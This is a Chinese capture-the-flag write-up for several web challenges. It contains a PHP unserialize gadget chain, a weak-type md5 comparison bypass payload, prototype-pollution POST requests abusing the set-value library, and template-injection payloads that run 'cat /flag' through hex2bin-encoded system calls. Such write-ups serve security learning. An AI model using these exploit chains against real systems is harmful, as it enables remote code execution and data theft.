划水的国赛Web

babyunserialize

www.zip源码泄露

参考 http://blog.ccreater.top/ wmctf 2020 webweb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
namespace DB{
  abstract class Cursor  implements \IteratorAggregate {}
}
namespace DB\SQL{
  class Mapper extends \DB\Cursor{
    protected
      $props=["quotekey"=>"call_user_func"],
      $adhoc=["phpinfo"=>["expr"=>""]],
      $db;
    function offsetExists($offset){}
    function offsetGet($offset){}
    function offsetSet($offset, $value){}
    function offsetUnset($offset){}
    function getIterator(){}
    function __construct($val){
      $this->db = $val;
    }
  }
}
namespace CLI{
  class Agent {
    protected
      $server="";
    public $events;
    public function __construct(){
      $this->events=["disconnect"=>array(new \DB\SQL\Mapper(new \DB\SQL\Mapper("")),"find")];
      $this->server=&$this;
    }
  };
  class WS{}
}
namespace {
  echo urlencode(serialize(array(new \CLI\WS(),new \CLI\Agent())));
}

easyphp

迭代使用call_user_func调用pcntl函数致使异常

1
http://eci-2zed3ztpomt9kf7xbbng.cloudeci1.ichunqiu.com/?a=call_user_func&b=pcntl_wait

easytrick

源码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
class trick{
    public $trick1;
    public $trick2;
    public function __destruct(){
        $this->trick1 = (string)$this->trick1;
        if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){
            die("你太长了");
        }
        if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){
            echo file_get_contents("/flag");
        }
    }
}
highlight_file(__FILE__);
unserialize($_GET['trick']);

弱类型判断绕过

1
O:5:"trick":2:{s:6:"trick1";i:1;s:6:"trick2";d:0.9999999999999999;}

littlegame

查看packge.json,发现set-value存在原型链污染 https://www.anquanke.com/vul/id/1715582

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
{
 "name": "littlegame",
 "version": "1.0.0",
 "private": true,
 "scripts": {
  "start": "node ./bin/www"
 },
 "dependencies": {
  "cookie-parser": "~1.4.4",
  "debug": "~2.6.9",
  "express": "~4.16.1",
  "express-session": "^1.17.1",
  "morgan": "~1.9.1",
  "set-value": "^3.0.0"
 }
}

在index.js找到flag接口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
const Admin = {
    "password1":process.env.p1,
    "password2":process.env.p2,
    "password3":process.env.p3
}
...
router.post("/DeveloperControlPanel", function (req, res, next) {
  // not implement
  if (req.body.key === undefined || req.body.password === undefined){
    res.send("What's your problem?");
  }else {
    let key = req.body.key.toString();
    let password = req.body.password.toString();
    if(Admin[key] === password){
      res.send(process.env.flag);
    }else {
      res.send("Wrong password!Are you Admin?");
    }
  }
});
...
router.post("/Privilege", function (req, res, next) {
    // Why not ask witch for help?
    if(req.session.knight === undefined){
        res.redirect('/SpawnPoint');
    }else{
        if (req.body.NewAttributeKey === undefined || req.body.NewAttributeValue === undefined) {
            res.send("What's your problem?");
        }else {
            let key = req.body.NewAttributeKey.toString();
            let value = req.body.NewAttributeValue.toString();
            setFn(req.session.knight, key, value);
            res.send("Let's have a check!");
        }
    }
});

构造如下exp:

1
2
3
4
5
http://eci-2ze2t1c804gx9bfude7s.cloudeci1.ichunqiu.com:8888/Privilege
POST NewAttributeKey=__proto__.password4&NewAttributeValue=tyao

http://eci-2ze2t1c804gx9bfude7s.cloudeci1.ichunqiu.com:8888/DeveloperControlPanel
POST key=password4&password=tyao

rceme

参考https://blog.csdn.net/qq_45708109/article/details/107645816

可以绕过的函数有很多,这里使用hex2bin

1
2
3
4
// phpinfo
?a={if:var_dump((hex2bin(%27706870696e666f%27))())}Tyao{end%20if}
// cat /flag
?a={if:var_dump(((hex2bin(%2773797374656d%27))(%27cat%20/flag%27)))}Tyao{end%20if}